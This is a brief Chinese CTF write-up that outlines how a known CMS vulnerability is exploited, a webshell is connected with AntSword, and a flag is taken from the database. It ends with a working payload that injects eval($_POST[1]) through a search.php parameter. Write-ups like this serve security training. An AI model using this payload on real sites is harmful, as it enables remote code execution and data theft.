“百度杯”CTF比赛 九月场_Test_WriteUp


打开网站

考点:已知CMS漏洞利用

在线搜索exploit

成功利用

蚁剑连接成功

找到flag

数据库配置文件

成功连接数据库 ,获得flag

payload

http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])